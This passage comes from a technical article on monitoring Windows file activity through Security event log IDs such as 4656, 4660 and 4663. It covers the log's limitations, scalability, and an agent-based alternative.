  • “Delete” may signify many things: delete, rename (same folder), move (to a different folder) or recycled, which is essentially a move to the recycle bin. Event 4660 with the same handle differentiate between delete or recycled for which a 4660 event is issued and a rename or move for which it is not.

Complex?

Consider this only as a starting point. The analysis above is somewhat simplified, and real-world implementation will require more research. Some areas for further research are:

  • Differentiating delete from recycle and move from rename.
  • Analyzing attributes access (with or without other access operations).
  • Handling event 4659 which is similar to 4660 but is logged on a request to delete a locked file on the next reboot rather than deleting them now.
  • Researching reports that events come out of order and the “request handle event” (4656) may not be the first in the sequence.

You may want to review this PowerShell Script which reads Windows events and generates from them meaningful file activity report to get a somewhat less simplified analysis. A word of warning: it is not for the faint-hearted!

Windows Event Log Limitations for File Access Monitoring

While the Windows file activity events seem comprehensive, there are things that cannot be determined using only the event log. A few examples are:

  • Create vs. modify: the only way to know if this is a new file or a modified file is to have knowledge of the prior state, i.e. whether the file existed before.
  • Missing information on failures: in a case of an operation that was rejected due to insufficient permissions, the only event issued is 4656. Without a sequence, most of the processing described in this article is not possible.
  • Cut & paste: while one would assume “cut and paste” would be similar to a move operation, in practice, the behavior seems to be similar to a delete operation followed by a create operation with no relations whatsoever between the two operations.

Scalability Considerations

Collecting Windows file activity is a massive event flow and the Microsoft event structure, generating many events for a single file action, does not help. Such collection will require more network bandwidth to transfer events and more storage to keep them. Furthermore, the sophisticated logic required may need a powerful processing unit and a lot of memory.

To reduce the overhead, you may want to:

  • Carefully select which files you monitor based on the scenario you plan to implement. For example, you may want to track only system files or shares that include sensitive data.
  • Limit collection of unneeded events at the source. If your collection infrastructure uses Microsoft Event Forwarding, you can build sophisticated filters based on event IDs and event properties. In our case, filter only events 4656, 4660, 4663 and optionally 4658 and only for the “Accesses” values needed.
  • Limit event storage and event sizes as raw Windows events are sizable.

An Alternative Approach

Real world experience shows that there are not many organizations that succeed in utilizing Windows Event Log for file activity monitoring. An alternative approach for implementing this important security and compliance measure would be to use a lightweight agent on each monitored Windows system, with a focus on file servers. Such an agent, similar to the Varonis agent alongside DatAdvantage, would record file activity with a minimal server and network overhead, enabling better threat detection and forensics.